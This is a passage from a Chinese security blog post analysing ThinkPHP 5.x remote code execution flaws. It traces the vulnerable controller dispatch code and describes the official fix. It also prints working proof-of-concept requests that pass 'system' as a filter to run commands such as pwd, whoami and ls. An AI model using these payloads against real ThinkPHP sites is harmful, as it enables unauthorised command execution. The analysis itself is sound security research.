<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;localhost:8000&#x2F;?s&#x3D;index&#x2F;\think\Request&#x2F;input&amp;filter[]&#x3D;system&amp;data&#x3D;pwd</span><br></pre></td></tr></table></figure>

<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150312.png" alt="image-20200923230344961"></p>
<p>可以看到系统命令成功执行。</p>
<p>根据修复的内容：对控制器名的获取，直接在获取控制器的地方下断点，来进行调试。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150235.png" alt="image-20200923231658510"></p>
<p>得出：控制器名是通过<code>$result[1]</code> 来获取的。</p>
<blockquote>
<p>而 <strong>$result</strong> 的值来源于兼容模式下的 <strong>pathinfo</strong> ，即 <strong>s</strong> 参数</p>
</blockquote>
<p>继续进行单步调试，程序会来到App类下的<code>run</code>方法</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200924150152.png" alt="image-20200924094001917"></p>
<p>继续调用<code>Dispatch</code>类的<code>run</code>方法，该方法调用了<code>exec</code> 方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">run</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    $option = <span class="keyword">$this</span>-&gt;rule-&gt;getOption();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 检测路由after行为</span></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">empty</span>($option[<span class="string">&#x27;after&#x27;</span>])) &#123;</span><br><span class="line">        $dispatch = <span class="keyword">$this</span>-&gt;checkAfter($option[<span class="string">&#x27;after&#x27;</span>]);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> ($dispatch <span class="keyword">instanceof</span> Response) &#123;</span><br><span class="line">            <span class="keyword">return</span> $dispatch;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 数据自动验证</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($option[<span class="string">&#x27;validate&#x27;</span>])) &#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;autoValidate($option[<span class="string">&#x27;validate&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    $data = <span class="keyword">$this</span>-&gt;exec();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;autoResponse($data);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">exec</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// 监听module_init</span></span><br><span class="line">    <span class="keyword">$this</span>-&gt;app[<span class="string">&#x27;hook&#x27;</span>]-&gt;listen(<span class="string">&#x27;module_init&#x27;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span> &#123;</span><br><span class="line">        <span class="comment">// 实例化控制器</span></span><br><span class="line">        $instance = <span class="keyword">$this</span>-&gt;app-&gt;controller(<span class="keyword">$this</span>-&gt;controller,</span><br><span class="line">            <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;url_controller_layer&#x27;</span>),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;controller_suffix&#x27;</span>),</span><br><span class="line">            <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;empty_controller&#x27;</span>));</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> ($instance <span class="keyword">instanceof</span> Controller) &#123;</span><br><span class="line">            $instance-&gt;registerMiddleware();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">catch</span> (ClassNotFoundException $e) &#123;</span><br><span class="line">        <span class="keyword">throw</span> <span class="keyword">new</span> HttpException(<span class="number">404</span>, <span class="string">&#x27;controller not exists:&#x27;</span> . $e-&gt;getClass());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">$this</span>-&gt;app[<span class="string">&#x27;middleware&#x27;</span>]-&gt;controller(<span class="function"><span class="keyword">function</span> (<span class="params">Request $request, $next</span>) <span class="title">use</span> (<span class="params">$instance</span>) </span>&#123;</span><br><span class="line">        <span class="comment">// 获取当前操作名</span></span><br><span class="line">        $action = <span class="keyword">$this</span>-&gt;actionName . <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;action_suffix&#x27;</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (is_callable([$instance, $action])) &#123;</span><br><span class="line">            <span class="comment">// 执行操作方法</span></span><br><span class="line">            $call = [$instance, $action];</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 严格获取当前操作方法名</span></span><br><span class="line">            $reflect    = <span class="keyword">new</span> ReflectionMethod($instance, $action);</span><br><span class="line">            $methodName = $reflect-&gt;getName();</span><br><span class="line">            $suffix     = <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;action_suffix&#x27;</span>);</span><br><span class="line">            $actionName = $suffix ? substr($methodName, <span class="number">0</span>, -strlen($suffix)) : $methodName;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;request-&gt;setAction($actionName);</span><br><span class="line"></span><br><span class="line">            <span class="comment">// 自动获取请求变量</span></span><br><span class="line">            $vars = <span class="keyword">$this</span>-&gt;rule-&gt;getConfig(<span class="string">&#x27;url_param_type&#x27;</span>)</span><br><span class="line">            ? <span class="keyword">$this</span>-&gt;request-&gt;route()</span><br><span class="line">            : <span class="keyword">$this</span>-&gt;request-&gt;param();</span><br><span class="line">            $vars = array_merge($vars, <span class="keyword">$this</span>-&gt;param);</span><br><span class="line">        &#125; <span class="keyword">elseif</span> (is_callable([$instance, <span class="string">&#x27;_empty&#x27;</span>])) &#123;</span><br><span class="line">            <span class="comment">// 空操作</span></span><br><span class="line">            $call    = [$instance, <span class="string">&#x27;_empty&#x27;</span>];</span><br><span class="line">            $vars    = [<span class="keyword">$this</span>-&gt;actionName];</span><br><span class="line">            $reflect = <span class="keyword">new</span> ReflectionMethod($instance, <span class="string">&#x27;_empty&#x27;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="comment">// 操作不存在</span></span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> HttpException(<span class="number">404</span>, <span class="string">&#x27;method not exists:&#x27;</span> . get_class($instance) . <span class="string">&#x27;-&gt;&#x27;</span> . $action . <span class="string">&#x27;()&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">$this</span>-&gt;app[<span class="string">&#x27;hook&#x27;</span>]-&gt;listen(<span class="string">&#x27;action_begin&#x27;</span>, $call);</span><br><span class="line"></span><br><span class="line">        $data = <span class="keyword">$this</span>-&gt;app-&gt;invokeReflectMethod($instance, $reflect, $vars);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;autoResponse($data);</span><br><span class="line">    &#125;);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;app[<span class="string">&#x27;middleware&#x27;</span>]-&gt;dispatch(<span class="keyword">$this</span>-&gt;request, <span class="string">&#x27;controller&#x27;</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$data = <span class="keyword">$this</span>-&gt;app-&gt;invokeReflectMethod($instance, $reflect, $vars);</span><br></pre></td></tr></table></figure>

<p>利用了反射机制，调用类的方法，这里类和方法都可控。</p>
<p>该方法中，<strong>未对实例化控制器和操作名进行任何过滤、合法性检测操作，这就是导致远程代码执行的直接原因。</strong></p>
<hr>
<p>如果直接拿该版本的 <strong>payload</strong> 去测试 <strong>ThinkPHP5.0.x</strong> 版本，会发现很多 <strong>payload</strong> 都不能成功。其原因是两个大版本已加载的类不同，导致可利用的类也不尽相同。具体如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br></pre></td><td class="code"><pre><span class="line">ThinkPHP 5.1.x                  ThinkPHP 5.0.x</span><br><span class="line">stdClass                        stdClass </span><br><span class="line">Exception                       Exception </span><br><span class="line">ErrorException                  ErrorException </span><br><span class="line">Closure                         Closure </span><br><span class="line">Generator                       Generator </span><br><span class="line">DateTime                        DateTime </span><br><span class="line">DateTimeImmutable               DateTimeImmutable </span><br><span class="line">DateTimeZone                    DateTimeZone </span><br><span class="line">DateInterval                    DateInterval </span><br><span class="line">DatePeriod                      DatePeriod </span><br><span class="line">LibXMLError                     LibXMLError </span><br><span class="line">DOMException                    DOMException </span><br><span class="line">DOMStringList                   DOMStringList </span><br><span class="line">DOMNameList                     DOMNameList </span><br><span class="line">DOMImplementationList           DOMImplementationList </span><br><span class="line">DOMImplementationSource         DOMImplementationSource </span><br><span class="line">DOMImplementation               DOMImplementation </span><br><span class="line">DOMNode                         DOMNode </span><br><span class="line">DOMNameSpaceNode                DOMNameSpaceNode </span><br><span class="line">DOMDocumentFragment             DOMDocumentFragment </span><br><span class="line">DOMDocument                     DOMDocument </span><br><span class="line">DOMNodeList                     DOMNodeList </span><br><span class="line">DOMNamedNodeMap                 DOMNamedNodeMap </span><br><span class="line">DOMCharacterData                DOMCharacterData </span><br><span class="line">DOMAttr                         DOMAttr </span><br><span class="line">DOMElement                      DOMElement </span><br><span class="line">DOMText                         DOMText </span><br><span class="line">DOMComment                      DOMComment </span><br><span class="line">DOMTypeinfo                     DOMTypeinfo </span><br><span class="line">DOMUserDataHandler              DOMUserDataHandler </span><br><span class="line">DOMDomError                     DOMDomError </span><br><span class="line">DOMErrorHandler                 DOMErrorHandler </span><br><span class="line">DOMLocator                      DOMLocator </span><br><span class="line">DOMConfiguration                DOMConfiguration </span><br><span class="line">DOMCdataSection                 DOMCdataSection </span><br><span class="line">DOMDocumentType                 DOMDocumentType </span><br><span class="line">DOMNotation                     DOMNotation </span><br><span class="line">DOMEntity                       DOMEntity </span><br><span class="line">DOMEntityReference              DOMEntityReference </span><br><span class="line">DOMProcessingInstruction        DOMProcessingInstruction </span><br><span class="line">DOMStringExtend                 DOMStringExtend </span><br><span class="line">DOMXPath                        DOMXPath </span><br><span class="line">finfo                           finfo </span><br><span class="line">LogicException                  LogicException </span><br><span class="line">BadFunctionCallException        BadFunctionCallException </span><br><span class="line">BadMethodCallException          BadMethodCallException </span><br><span class="line">DomainException                 DomainException </span><br><span class="line">InvalidArgumentException        InvalidArgumentException </span><br><span class="line">LengthException                 LengthException </span><br><span class="line">OutOfRangeException             OutOfRangeException </span><br><span class="line">RuntimeException                RuntimeException </span><br><span class="line">OutOfBoundsException            OutOfBoundsException </span><br><span class="line">OverflowException               OverflowException </span><br><span class="line">RangeException                  RangeException </span><br><span class="line">UnderflowException              UnderflowException </span><br><span class="line">UnexpectedValueException        UnexpectedValueException </span><br><span class="line">RecursiveIteratorIterator       RecursiveIteratorIterator </span><br><span class="line">IteratorIterator                IteratorIterator </span><br><span class="line">FilterIterator                  FilterIterator </span><br><span class="line">RecursiveFilterIterator         RecursiveFilterIterator </span><br><span class="line">CallbackFilterIterator          CallbackFilterIterator </span><br><span class="line">RecursiveCallbackFilterIterator RecursiveCallbackFilterIterator </span><br><span class="line">ParentIterator                  ParentIterator </span><br><span class="line">LimitIterator                   LimitIterator </span><br><span class="line">CachingIterator                 CachingIterator </span><br><span class="line">RecursiveCachingIterator        RecursiveCachingIterator </span><br><span class="line">NoRewindIterator                NoRewindIterator </span><br><span class="line">AppendIterator                  AppendIterator </span><br><span class="line">InfiniteIterator                InfiniteIterator </span><br><span class="line">RegexIterator                   RegexIterator </span><br><span class="line">RecursiveRegexIterator          RecursiveRegexIterator </span><br><span class="line">EmptyIterator                   EmptyIterator </span><br><span class="line">RecursiveTreeIterator           RecursiveTreeIterator </span><br><span class="line">ArrayObject                     ArrayObject </span><br><span class="line">ArrayIterator                   ArrayIterator </span><br><span class="line">RecursiveArrayIterator          RecursiveArrayIterator </span><br><span class="line">SplFileInfo                     SplFileInfo </span><br><span class="line">DirectoryIterator               DirectoryIterator </span><br><span class="line">FilesystemIterator              FilesystemIterator </span><br><span class="line">RecursiveDirectoryIterator      RecursiveDirectoryIterator </span><br><span class="line">GlobIterator                    GlobIterator </span><br><span class="line">SplFileObject                   SplFileObject </span><br><span class="line">SplTempFileObject               SplTempFileObject </span><br><span class="line">SplDoublyLinkedList             SplDoublyLinkedList </span><br><span class="line">SplQueue                        SplQueue </span><br><span class="line">SplStack                        SplStack </span><br><span class="line">SplHeap                         SplHeap </span><br><span class="line">SplMinHeap                      SplMinHeap </span><br><span class="line">SplMaxHeap                      SplMaxHeap </span><br><span class="line">SplPriorityQueue                SplPriorityQueue </span><br><span class="line">SplFixedArray                   SplFixedArray </span><br><span class="line">SplObjectStorage                SplObjectStorage </span><br><span class="line">MultipleIterator                MultipleIterator </span><br><span class="line">SessionHandler                  SessionHandler </span><br><span class="line">ReflectionException             ReflectionException </span><br><span class="line">Reflection                      Reflection </span><br><span class="line">ReflectionFunctionAbstract      ReflectionFunctionAbstract </span><br><span class="line">ReflectionFunction              ReflectionFunction </span><br><span class="line">ReflectionParameter             ReflectionParameter </span><br><span class="line">ReflectionMethod                ReflectionMethod </span><br><span class="line">ReflectionClass                 ReflectionClass </span><br><span class="line">ReflectionObject                ReflectionObject </span><br><span class="line">ReflectionProperty              ReflectionProperty </span><br><span class="line">ReflectionExtension             ReflectionExtension </span><br><span class="line">ReflectionZendExtension         ReflectionZendExtension </span><br><span class="line">__PHP_Incomplete_Class          __PHP_Incomplete_Class </span><br><span class="line">php_user_filter                 php_user_filter </span><br><span class="line">Directory                       Directory </span><br><span class="line">SimpleXMLElement                SimpleXMLElement </span><br><span class="line">SimpleXMLIterator               SimpleXMLIterator </span><br><span class="line">SoapClient                      SoapClient </span><br><span class="line">SoapVar                         SoapVar </span><br><span class="line">SoapServer                      SoapServer </span><br><span class="line">SoapFault                       SoapFault </span><br><span class="line">SoapParam                       SoapParam </span><br><span class="line">SoapHeader                      SoapHeader </span><br><span class="line">PharException                   PharException </span><br><span class="line">Phar                            Phar </span><br><span class="line">PharData                        PharData </span><br><span class="line">PharFileInfo                    PharFileInfo </span><br><span class="line">XMLReader                       XMLReader </span><br><span class="line">XMLWriter                       XMLWriter </span><br><span class="line">ZipArchive                      ZipArchive </span><br><span class="line">PDOException                    PDOException </span><br><span class="line">PDO                             PDO </span><br><span class="line">PDOStatement                    PDOStatement </span><br><span class="line">PDORow                          PDORow </span><br><span class="line">CURLFile                        CURLFile </span><br><span class="line">Collator                        Collator </span><br><span class="line">NumberFormatter                 NumberFormatter </span><br><span class="line">Normalizer                      Normalizer </span><br><span class="line">Locale                          Locale </span><br><span class="line">MessageFormatter                MessageFormatter </span><br><span class="line">IntlDateFormatter               IntlDateFormatter </span><br><span class="line">ResourceBundle                  ResourceBundle </span><br><span class="line">Transliterator                  Transliterator </span><br><span class="line">IntlTimeZone                    IntlTimeZone </span><br><span class="line">IntlCalendar                    IntlCalendar </span><br><span class="line">IntlGregorianCalendar           IntlGregorianCalendar </span><br><span class="line">Spoofchecker                    Spoofchecker </span><br><span class="line">IntlException                   IntlException </span><br><span class="line">IntlIterator                    IntlIterator </span><br><span class="line">IntlBreakIterator               IntlBreakIterator </span><br><span class="line">IntlRuleBasedBreakIterator      IntlRuleBasedBreakIterator </span><br><span class="line">IntlCodePointBreakIterator      IntlCodePointBreakIterator </span><br><span class="line">IntlPartsIterator               IntlPartsIterator </span><br><span class="line">UConverter                      UConverter </span><br><span class="line">JsonIncrementalParser           JsonIncrementalParser </span><br><span class="line">mysqli_sql_exception            mysqli_sql_exception </span><br><span class="line">mysqli_driver                   mysqli_driver </span><br><span class="line">mysqli                          mysqli </span><br><span class="line">mysqli_warning                  mysqli_warning </span><br><span class="line">mysqli_result                   mysqli_result </span><br><span class="line">mysqli_stmt                     mysqli_stmt </span><br><span class="line">Composer\Autoload\ComposerStaticInit81a0c33d33d83a86fdd976e2aff753d9            Composer\Autoload\ComposerStaticInit8a67cf04fc9c0db5b85a9d897c12a44c </span><br><span class="line">think\Loader                    think\Loader</span><br><span class="line">think\Error                     think\Error </span><br><span class="line">think\Container                 think\Config </span><br><span class="line">think\App                       think\App </span><br><span class="line">think\Env                       think\Request </span><br><span class="line">think\Config                    think\Hook </span><br><span class="line">think\Hook                      think\Env </span><br><span class="line">think\Facade                    think\Lang </span><br><span class="line">think\facade\Env                think\Log </span><br><span class="line">env                             think\Route</span><br><span class="line">think\Db </span><br><span class="line">think\Lang </span><br><span class="line">think\Request </span><br><span class="line">think\facade\Route </span><br><span class="line">route </span><br><span class="line">think\Route </span><br><span class="line">think\route\Rule </span><br><span class="line">think\route\RuleGroup </span><br><span class="line">think\route\Domain </span><br><span class="line">think\route\RuleItem </span><br><span class="line">think\route\RuleName </span><br><span class="line">think\route\Dispatch </span><br><span class="line">think\route\dispatch\Url </span><br><span class="line">think\route\dispatch\Module </span><br><span class="line">think\Middleware </span><br><span class="line">think\Cookie </span><br><span class="line">think\View </span><br><span class="line">think\view\driver\Think </span><br><span class="line">think\Template </span><br><span class="line">think\template\driver\File </span><br><span class="line">think\Log </span><br><span class="line">think\log\driver\File </span><br><span class="line">think\Session </span><br><span class="line">think\Debug </span><br><span class="line">think\Cache </span><br><span class="line">think\cache\Driver </span><br><span class="line">think\cache\driver\File </span><br></pre></td></tr></table></figure>

<h2 id="利用总结-1"><a href="#利用总结-1" class="headerlink" title="利用总结"></a>利用总结</h2><p>by Mochazz:</p>
<p><img src="https://github.com/Mochazz/ThinkPHP-Vuln/raw/master/ThinkPHP5/ThinkPHP5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B9%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C9/8.png" alt="8"></p>
<h2 id="漏洞修复-1"><a href="#漏洞修复-1" class="headerlink" title="漏洞修复"></a>漏洞修复</h2><blockquote>
<p>代码层面：增加对控制器名的合法性检查。</p>
<p>应急层面：临时开启强制路由。</p>
</blockquote>
<p>官方的修复方法是：增加正则表达式 <code>^[A-Za-z](\w)*$</code> ，对控制器名进行合法性检测。</p>
<p><img src="https://cdn.jsdelivr.net/gh/ifonly-go2019/PicGo//images/20200923224451.png" alt="image-20200923224445456"></p>
<h1 id="RCE3"><a href="#RCE3" class="headerlink" title="RCE3"></a>RCE3</h1><h2 id="POC-2"><a href="#POC-2" class="headerlink" title="POC"></a>POC</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"># ThinkPHP &lt;&#x3D; 5.0.13</span><br><span class="line">POST &#x2F;?s&#x3D;index&#x2F;index</span><br><span class="line">s&#x3D;whoami&amp;_method&#x3D;__construct&amp;method&#x3D;&amp;filter[]&#x3D;system</span><br><span class="line"></span><br><span class="line"># ThinkPHP &lt;&#x3D; 5.0.23、5.1.0 &lt;&#x3D; 5.1.16 需要开启框架app_debug</span><br><span class="line">POST &#x2F;</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;server[REQUEST_METHOD]&#x3D;ls -al</span><br><span class="line"></span><br><span class="line"># ThinkPHP &lt;&#x3D; 5.0.23 需要存在xxx的method路由，例如captcha</span><br><span class="line">POST &#x2F;?s&#x3D;xxx HTTP&#x2F;1.1</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;method&#x3D;get&amp;get[]&#x3D;ls+-al</span><br><span class="line">_method&#x3D;__construct&amp;filter[]&#x3D;system&amp;method&#x3D;get&amp;server[REQUEST_METHOD]&#x3D;ls</span><br></pre></td></tr></table></figure>

<h2 id="漏洞概述-2"><a href="#漏洞概述-2" class="headerlink" title="漏洞概述"></a>漏洞概述</h2><p>和上一个RCE直接原因一样，都是没有对控制器进行很好的合法性校验。</p>
<p>漏洞存在于 <strong>ThinkPHP</strong> 底层没有对控制器名进行很好的合法性校验，导致在未开启强制路由的情况下，用户可以调用任意类的任意方法，最终导致 <strong>远程代码执行漏洞</strong> 的产生。</p>
<h2 id="影响版本-2"><a href="#影响版本-2" class="headerlink" title="影响版本"></a>影响版本</h2><p><strong>5.0.0&lt;=ThinkPHP5&lt;=5.0.23</strong> 、<strong>5.1.0&lt;=ThinkPHP&lt;=5.1.30</strong></p>
<h2 id="漏洞分析-2"><a href="#漏洞分析-2" class="headerlink" title="漏洞分析"></a>漏洞分析</h2><h2 id="利用总结-2"><a href="#利用总结-2" class="headerlink" title="利用总结"></a>利用总结</h2><h2 id="漏洞修复-2"><a href="#漏洞修复-2" class="headerlink" title="漏洞修复"></a>漏洞修复</h2>
    </article>
    <!-- license  -->
    
        <div class="license-wrapper">
            <p>Author：<a href="https://hack-for.fun">m0nk3y</a>
            <p>原文链接：<a href="https://hack-for.fun/a45.html">https://hack-for.fun/a45.html</a>
            <p>发表日期：<a href="https://hack-for.fun/a45.html">September 23rd 2020, 11:04:09 am</a>
            <p>更新日期：<a href="https://hack-for.fun/a45.html">September 27th 2020, 9:39:21 pm</a>
            <p>版权声明：<b>原创文章转载时请注明出处</b></p>
        </div>
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/5dcc.html" title= "CSS 注入学习笔记">
                    <div class="prevTitle">CSS 注入学习笔记</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- gitalk评论 -->

    <!-- utteranc评论 -->

    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:ifonlysec@gmail.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
    
    <span id="busuanzi_container_site_uv">累计访客量: <span id="busuanzi_value_site_uv"></span> </span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
